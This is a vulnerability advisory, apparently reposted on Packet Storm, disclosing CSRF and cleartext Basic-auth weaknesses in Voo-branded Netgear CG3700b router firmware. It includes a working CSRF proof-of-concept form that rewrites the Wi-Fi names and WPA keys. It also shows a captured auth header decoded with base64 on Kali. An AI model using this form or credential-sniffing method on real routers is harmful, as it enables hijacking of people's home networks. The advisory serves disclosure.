Exploit the possiblities

Voo Branded Netgear CG3700b Firmware CSRF / Authentication

Voo Branded Netgear CG3700b Firmware CSRF / Authentication
Posted Apr 27, 2016
Authored by dev

Voo branded Netgear CG3700b custom firmware version 2.02.03 suffers from cross site request forgery and insufficient authentication vulnerabilities.

tags | exploit, vulnerability, csrf
MD5 | f56165d9368729c1623e374b5e46c6e3

Voo Branded Netgear CG3700b Firmware CSRF / Authentication

Change Mirror Download
CVEs pending, screenshots and further examples available soon on my site.


Cross-Site Request Forgery (CSRF) on all form POSTs
---------------------------------------------------------------------------------
The Voo branded Netgear CG3700b custom firmware (newest version, V2.02.03)
allows a (context-dependent) attacker to perform a Cross-Site Request
Forgery (CSRF) attack on all configuration setting
(/goform/<settingspage>) page POST requests. By tricking a user into
following a specially crafted link, an attacker can modify all settings
including WEP/WPA/WPA2 keys, restore the router to factory settings, or
even upload an entire malicious configuration file.

Example:
<form method="POST" name="form0" action="http://192.168.0.1/goform/index"
<input type="hidden" name="group_parametrage_wifi" value="active">
<input type="hidden" name="reseau_wifi_name" value="NEWSSID">
<input type="hidden" name="nom_select" value="AUTO-PSK">
<input type="hidden" name="canal" value=0>
<input type="hidden" name="mot_de_passe" value="NEWWPAKEY">
<input type="hidden" name="NBandwidth" value=20>
<input type="hidden" name="group_parametrage_wifi_an" value="active">
<input type="hidden" name="reseau_wifi_name_an" value="NEWSSID-5G">
<input type="hidden" name="nom_select_an" value="AUTO-PSK">
<input type="hidden" name="canal_an" value=0>
<input type="hidden" name="mot_de_passe_an" value="NEWWPAKEY-5G">
<input type="hidden" name="NBandwidth_an" value=20>
<input type="hidden" name="group_fon" value="desactiver">
<input type="hidden" name="buttonApply" value=1>
<input type="hidden" name="only_mode" value=0>
<input type="hidden" name="selected_ch_an" value=1>
</form>


Insufficient Authentication (OWASP-A2)
-----------------------------------------------------------
This same modem handles authentication via basic authentication over the
default (HTTP, non-ssl) connection. This allows an attacker to easily
decode the base64 encoded username and password, and authenticate to the
router. This only requires an attacker be on the same network as the
router, and sniff the clear-text traffic.

Example:
POST http://192.168.0.1/goform/parametre_config HTTP/1.1
Host: 192.168.0.1
Connection: keep-alive
Content-Length: 24721
Cache-Control: max-age=0
Authorization: Basic dm9vOlBBU1NXT1JE

root@kali:~# cat voo.txt
dm9vOlBBU1NXT1JE
root@kali:~# base64 --decode voo.txt
voo:PASSWORD



Disclosure Timeline
-----------------------------
22 Jan - discovered vulnerability, initially notified vendor
23 Jan - requested CVE
7 Mar - contacted vendor again, was notified that this will not be fixed
at this time
20 April - attempted to contact Mitre again to receive CVE
21 April - sent to Full Disclosure
23 April - additional information (tentatively) posted to
http://www.doyler.net
26 April - resending to Full Disclosure due to some errors



Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

December 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    15 Files
  • 2
    Dec 2nd
    2 Files
  • 3
    Dec 3rd
    1 Files
  • 4
    Dec 4th
    15 Files
  • 5
    Dec 5th
    15 Files
  • 6
    Dec 6th
    18 Files
  • 7
    Dec 7th
    17 Files
  • 8
    Dec 8th
    15 Files
  • 9
    Dec 9th
    13 Files
  • 10
    Dec 10th
    4 Files
  • 11
    Dec 11th
    28 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close